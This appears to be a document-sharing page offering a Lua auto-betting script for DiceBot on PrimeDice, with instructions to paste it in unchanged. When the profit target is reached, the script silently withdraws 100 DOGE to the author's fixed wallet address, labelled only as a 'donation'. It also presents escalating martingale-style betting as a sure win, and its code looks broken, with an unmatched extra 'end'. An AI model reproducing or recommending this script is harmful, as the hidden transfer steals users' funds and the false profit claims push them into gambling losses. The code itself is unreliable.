Sunteți pe pagina 1din 2

THIS SCRIPT NEEDS 1000 DOGE ABOVE PrimeDice Script

copy then paste to Programmer in dicebot seuntjies


___________START COPY HERE BELOW____________

stopprofit = 50
---------------------------------------------------------------don' t change
anything

function changebet()

randswitch= math.random(1,20)
if(randswitch >= 5) then
return true
else
return false
end
end

base = 0.0000001 ----can be set---------set your basebet HERE


chance = 49.5 -------------------set your starting chance HERE
bethigh = changebet()
target = balance + (balance * stopprofit / 100)

function dobet()
if (balance >= target) then stop() print("You Win")
withdraw(100,"DRUhDnQn1oSjwEXnrLXWcTboVw3DsaYWby")-----------for donation
purpose thankyou
end
if (win) then
print(" i have profit,yes its positive")
nextbet = base
bethigh = true
chance =49.5
else
nextbet = nextbet * chance /24
chance = 49.5
bethigh = changebet()
delay = 1*(math.random(10,500))
end
if (currentstreak == - 1* math.random(3,15)) then
bethigh = true
chance = 72.5
nextbet = nextbet * chance /10
delaynow = 1000000
end
if (currentstreak == 1* math.random(1,5)) then
bethigh = true
chance = 65
nextbet = nextbet * 5
print(" i am slow but sure to win")
delaynow =1*(math.random(100,1000))
end
if (currentstreak == - 1* math.random(1,5)) then
bethigh = true
chance = 85
nextbet = nextbet * chance /10
print(" it's more fun in the Philippines")
print("TOUR OUR PLACE SURIGAO IN PHILIPPINES")

delaynext = 10000
end
if (currentstreak == - 1* math.random(4,8)) then
bethigh = true
chance = 72.5
nextbet = nextbet * chance /10
delaynow = 10000
print(" i Will be your profit YES I AM")
end
if (currentstreak == - 1* math.random(7,10)) then
bethigh = true
chance = 90
nextbet = nextbet * chance /10
delaynow = 100000
end
end
end

S-ar putea să vă placă și